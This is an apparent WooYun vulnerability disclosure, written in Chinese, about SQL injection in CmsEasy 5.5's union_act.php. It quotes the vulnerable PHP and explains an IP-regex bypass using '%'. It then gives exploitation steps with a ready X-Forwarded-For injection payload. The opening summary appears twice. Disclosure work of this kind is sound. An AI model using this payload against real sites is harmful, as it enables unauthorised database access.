### 简要描述: CmsEasy最新版SQL注入(同一文件多处) ### 详细说明: 与: [WooYun: CmsEasy最新版本无限制SQL注射](http://www.wooyun.org/bugs/wooyun-2014-062957) 重复 CmsEasy_5.5_UTF-8_20140420 官方最新包 文件/lib/default/union_act.php 此文件存在多处SQL注入 第一处SQL注入,在联盟注册处: http://localhost/cmseasy5.5/index.php?case=union&act=register ``` function register_action() { $r = $this->_union->getrow(array('userid'=>$this->view->data['userid'])); if($r) { echo '<script type="text/javascript">alert("'.lang('你已经申请,转入联盟页面!').'")</script>'; front::refresh(url::create('union/stats')); } if(front::post('submit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(config::get('verifycode')) { if(!session::get('verify') ||front::post('verify')<>session::get('verify')) { front::flash(lang('验证码错误!')); return; } } if(front::post('nickname') != strip_tags(front::post('nickname')) ||front::post('nickname') != htmlspecialchars(front::post('nickname')) ) { front::flash(lang('姓名不规范!')); return; } if(strlen(front::post('nickname'))<4)...
### 简要描述: CmsEasy最新版SQL注入(同一文件多处) ### 详细说明: 与: [WooYun: CmsEasy最新版本无限制SQL注射](http://www.wooyun.org/bugs/wooyun-2014-062957) 重复 CmsEasy_5.5_UTF-8_20140420 官方最新包 文件/lib/default/union_act.php 此文件存在多处SQL注入 第一处SQL注入,在联盟注册处: http://localhost/cmseasy5.5/index.php?case=union&act=register ``` function register_action() { $r = $this->_union->getrow(array('userid'=>$this->view->data['userid'])); if($r) { echo '<script type="text/javascript">alert("'.lang('你已经申请,转入联盟页面!').'")</script>'; front::refresh(url::create('union/stats')); } if(front::post('submit')) { if(!config::get('reg_on')) { front::flash(lang('网站已经关闭注册!')); return; } if(config::get('verifycode')) { if(!session::get('verify') ||front::post('verify')<>session::get('verify')) { front::flash(lang('验证码错误!')); return; } } if(front::post('nickname') != strip_tags(front::post('nickname')) ||front::post('nickname') != htmlspecialchars(front::post('nickname')) ) { front::flash(lang('姓名不规范!')); return; } if(strlen(front::post('nickname'))<4) { front::flash(lang('请填写认真填写真实姓名!')); return; } if(strlen(front::post('payaccount'))<1) { front::flash(lang('请填写支付账号!')); return; } if(strlen(front::post('tel'))<1) { front::flash(lang('请填写联系电话!')); return; } if(strlen(front::post('address'))<1) { front::flash(lang('请填写联系地址!')); return; } if(strlen(front::post('website'))<1) { front::flash(lang('请填写网站地址!')); return; } /*if(strlen(front::post('e_mail'))<1) { front::flash(lang('请填写邮箱!')); return; }*/ if(is_array($_POST)){ foreach ($_POST as $v){ if(preg_match('/(select|load_file|\[|password)/i', $v)){ exit('not access'); } } } $userarr = array(); $userarr['nickname'] = front::$post['nickname']; $userarr['tel'] = front::$post['tel']; $userarr['address'] = front::$post['address']; //$userarr['e_mail'] = front::$post['e_mail']; $unionarr = array(); $unionarr['userid'] = $this->view->data['userid']; $unionarr['username'] = $this->view->data['username']; $unionarr['payaccount'] = front::$post['payaccount']; $unionarr['website'] = front::$post['website']; $unionarr['profitmargin'] = union::getconfig('profitmargin'); $unionarr['regtime'] = time(); $unionarr['regip'] = front::ip(); $unionarr['passed'] = 1; if(front::post('nickname') &&$this->view->data['userid']) { $insert=$this->_user->rec_update($userarr,'userid='.$this->view->user['userid']); $insert1 = $this->_union->rec_insert($unionarr); if($insert &&$insert1) front::flash(lang('申请成功!')); else { front::flash(lang('申请失败!')); return; } front::redirect(url::create('union/stats')); exit; } else { front::flash(lang('申请失败!')); return; } } } ``` $unionarr['regip'] = front::ip(); 我们来看看这里的ip()函数: ``` static function ip() { if ($_SERVER['HTTP_CLIENT_IP']) { $onlineip = $_SERVER['HTTP_CLIENT_IP']; } elseif ($_SERVER['HTTP_X_FORWARDED_FOR']) { $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif ($_SERVER['REMOTE_ADDR']) { $onlineip = $_SERVER['REMOTE_ADDR']; } else { $onlineip = $_SERVER['REMOTE_ADDR']; } if(config::get('ipcheck_enable')){ if(!preg_match('/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/', $onlineip)&&!preg_match('@^\s*((([0-9A-Fa-f]{1,4}:){7}(([0-9A-Fa-f]{1,4})|:))|(([0-9A-Fa-f]{1,4}:){6}(:|((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})|(:[0-9A-Fa-f]{1,4})))|(([0-9A-Fa-f]{1,4}:){5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){4}(:[0-9A-Fa-f]{1,4}){0,1}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){3}(:[0-9A-Fa-f]{1,4}){0,2}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:){2}(:[0-9A-Fa-f]{1,4}){0,3}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(([0-9A-Fa-f]{1,4}:)(:[0-9A-Fa-f]{1,4}){0,4}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(:(:[0-9A-Fa-f]{1,4}){0,5}((:((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})?)|((:[0-9A-Fa-f]{1,4}){1,2})))|(((25[0-5]|2[0-4]\d|[01]?\d{1,2})(\.(25[0-5]|2[0-4]\d|[01]?\d{1,2})){3})))(%.+)?\s*$@', $onlineip)){ exit('来源非法'); } } return $onlineip; } ``` 这里的正则存在问题,最后一句的(%.+),这里我们在IP后面加上%,然后就能跟上任意内容 那么我们使用1.1.1.1%xxx就能绕过正则进行注入了。 第二处SQL注入: ``` function into_action() { preg_match_all("/case=union&act=into&(.*)/isu",$_SERVER['QUERY_STRING'],$queryout); if(!empty($queryout[1][0])) { $userid = intval($queryout[1][0]); $r = $this->_union->getrow(array('userid'=>$userid)); if($r) { $time = time() -3600*24; $unionvisit = new union_visit(); $r_visit = $unionvisit->rec_select("userid=$userid AND visitip='".front::ip()."' AND visittime>$time",0,'*',' 1'); if(!$r_visit) { $rewardtype = union::getconfig('rewardtype'); $rewardnumber = union::getconfig('rewardnumber'); $user = $this->_user->getrow(array('userid'=>$userid)); $user['username']; switch($rewardtype) { case 'point': union::pointadd($user['username'],$rewardnumber,'union'); break; } $useridarr = array(); $useridarr['userid'] = $userid; $updatevisit = $this->_union->rec_update(array('visits'=>'[visits+1]'),$useridarr); if($this->_union->affected_rows()) { $useridarr['userid'] = $userid; $useridarr['visittime'] = time(); $useridarr['visitip'] = front::ip(); $useridarr['referer'] = $_SERVER['HTTP_REFERER']; if(preg_match('/select/i',$useridarr['referer']) || preg_match('/union/i',$useridarr['referer']) || preg_match('/"/i',$useridarr['referer']) ||preg_match('/\'/i',$useridarr['referer'])){ exit('非法参数'); } $unionvisit->rec_insert($useridarr); $union_visitid = $unionvisit->insert_id(); $cookietime = time() +union::getconfig('keeptime'); cookie::set('union_visitid',$union_visitid,$cookietime); cookie::set('union_userid',$userid,$cookietime); } } } } $url = union::getconfig('forward') ?union::getconfig('forward') : config::get('site_url'); header('location:'.$url); } ``` $useridarr['visitip'] = front::ip(); ### 漏洞证明: 第一步: 首先注册两个用户111111,222222 他们的userid分别为2,3(因为admin占了一个id) 第二步: 登陆用户111111 然后注册联盟 [<img src="https://images.seebug.org/upload/201406/051344511142565321f10f69e8cdec5051302b6f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/051344511142565321f10f69e8cdec5051302b6f.png) 第三步 抓包,修改头信息,添加: ``` X-Forwarded-For: 1.1.1.1%','1'),('3',user(),user(),user(),'2','1','1.1.1.1','1')#','1') ``` [<img src="https://images.seebug.org/upload/201406/05134551529ca3ef296fb2d040a06aafbf2fb608.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/05134551529ca3ef296fb2d040a06aafbf2fb608.png) 第四步 登陆用户222222,然后进入会员中心,联盟推广,修改资料 [<img src="https://images.seebug.org/upload/201406/051346304ffafc64d5e079e4a536db65bc13f5c0.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/051346304ffafc64d5e079e4a536db65bc13f5c0.png) 注入内容显示在支付账户和网站地址处
